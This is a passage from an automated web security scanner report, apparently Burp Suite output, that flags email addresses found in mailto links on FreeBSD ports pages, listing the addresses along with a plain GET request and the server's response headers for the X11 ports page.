<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:amdmi3@FreeBSD.org">amdmi3@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:wenheping@gmail.com">wenheping@gmail.com</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jacob.frelinger@duke.edu">jacob.frelinger@duke.edu</A>
...[SNIP]...
<A HREF="mailto:jacob.frelinger@duke.edu">jacob.frelinger@duke.edu</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lx@FreeBSD.org">lx@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:neal@nelson.name">neal@nelson.name</A>
...[SNIP]...
<A HREF="mailto:neal@nelson.name">neal@nelson.name</A>
...[SNIP]...
<A HREF="mailto:neal@nelson.name">neal@nelson.name</A>
...[SNIP]...
<A HREF="mailto:neal@nelson.name">neal@nelson.name</A>
...[SNIP]...
<A HREF="mailto:neal@nelson.name">neal@nelson.name</A>
...[SNIP]...
<A HREF="mailto:neal@nelson.name">neal@nelson.name</A>
...[SNIP]...
<A HREF="mailto:mwm@mired.org">mwm@mired.org</A>
...[SNIP]...
<A HREF="mailto:daichi@FreeBSD.org">daichi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:makc@FreeBSD.org">makc@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:makc@FreeBSD.org">makc@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:makc@FreeBSD.org">makc@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lercordeiro@gmail.com">lercordeiro@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:cyberbotx@cyberbotx.com">cyberbotx@cyberbotx.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:utisoft@gmail.com">utisoft@gmail.com</A>
...[SNIP]...
<A HREF="mailto:shuvaev@physik.uni-wuerzburg.de">shuvaev@physik.uni-wuerzburg.de</A>
...[SNIP]...
<A HREF="mailto:shuvaev@physik.uni-wuerzburg.de">shuvaev@physik.uni-wuerzburg.de</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rnoland@FreeBSD.org">rnoland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rnoland@FreeBSD.org">rnoland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:doconnor@gsoft.com.au">doconnor@gsoft.com.au</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kwm@FreeBSD.org">kwm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:m.sund@arcor.de">m.sund@arcor.de</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:araujo@FreeBSD.org">araujo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jochen@daten-chaos.de">jochen@daten-chaos.de</A>
...[SNIP]...
<A HREF="mailto:alepulver@FreeBSD.org">alepulver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:m.sund@arcor.de">m.sund@arcor.de</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.ORG">ports@FreeBSD.ORG</A>
...[SNIP]...
<A HREF="mailto:yokota@res.otaru-uc.ac.jp">yokota@res.otaru-uc.ac.jp</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kevlo@FreeBSD.org">kevlo@FreeBSD.org</A>
...[SNIP]...

24.321. http://www.freebsd.org/ports/x11.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /ports/x11.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ports/x11.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "3345228891"
Last-Modified: Sun, 23 Jan 2011 02:29:34 GMT
Content-Length: 1680230
Connection: close
Date: Mon, 24 Jan 2011 16:16:33 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: X11</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/htm
...[SNIP]...
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kazu@jp.freebsd.org">kazu@jp.freebsd.org</A>
...[SNIP]...
<A HREF="mailto:kmoore@freebsd.org">kmoore@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:kmoore@freebsd.org">kmoore@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:kmoore@freebsd.org">kmoore@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:kmoore@FreeBSD.org">kmoore@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lme@FreeBSD.org">lme@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:maho@FreeBSD.org">maho@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:simon@olofsson.de">simon@olofsson.de</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rodrigo@bebik.net">rodrigo@bebik.net</A>
...[SNIP]...
<A HREF="mailto:itetcu@people.tecnik93.com">itetcu@people.tecnik93.com</A>
...[SNIP]...
<A HREF="mailto:citycat4@ngs.ru">citycat4@ngs.ru</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:spam@rm-rf.kiev.ua">spam@rm-rf.kiev.ua</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ashish@FreeBSD.org">ashish@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ashish@FreeBSD.org">ashish@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:avg@icyb.net.ua">avg@icyb.net.ua</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:akosela@andykosela.com">akosela@andykosela.com</A>
...[SNIP]...
<A HREF="mailto:akosela@andykosela.com">akosela@andykosela.com</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oleg@bsdpower.com">oleg@bsdpower.com</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:doublef@tele-kom.ru">doublef@tele-kom.ru</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:henry.hu.sh@gmail.com">henry.hu.sh@gmail.com</A>
...[SNIP]...
<A HREF="mailto:bapt@FreeBSD.org">bapt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kimelto@gmail.com">kimelto@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tom@hur.st">tom@hur.st</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vlad@vlad.uz.ua">vlad@vlad.uz.ua</A>
...[SNIP]...
<A HREF="mailto:dougb@FreeBSD.org">dougb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dsh@vlink.ru">dsh@vlink.ru</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olivier@cochard.me">olivier@cochard.me</A>
...[SNIP]...
<A HREF="mailto:xride@FreeBSD.org">xride@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:uqs@FreeBSD.org">uqs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:flz@FreeBSD.org">flz@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:karlj000@unbc.ca">karlj000@unbc.ca</A>
...[SNIP]...
<A HREF="mailto:t.kempka@web.de">t.kempka@web.de</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lx@FreeBSD.org">lx@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:adam-ports@blacktabby.org">adam-ports@blacktabby.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ecrist@secure-computing.net">ecrist@secure-computing.net</A>
...[SNIP]...
<A HREF="mailto:sec@42.org">sec@42.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chip-set@mail.ru">chip-set@mail.ru</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@eitanadler.com">ports@eitanadler.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:motoom@xs4all.nl">motoom@xs4all.nl</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hopet@ics.muni.cz">hopet@ics.muni.cz</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ashish@FreeBSD.org">ashish@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ntarmos@cs.uoi.gr">ntarmos@cs.uoi.gr</A>
...[SNIP]...
<A HREF="mailto:lioux@FreeBSD.org">lioux@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@eitanadler.com">ports@eitanadler.com</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:cy@FreeBSD.org">cy@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:wxs@FreeBSD.org">wxs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rene@FreeBSD.org">rene@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
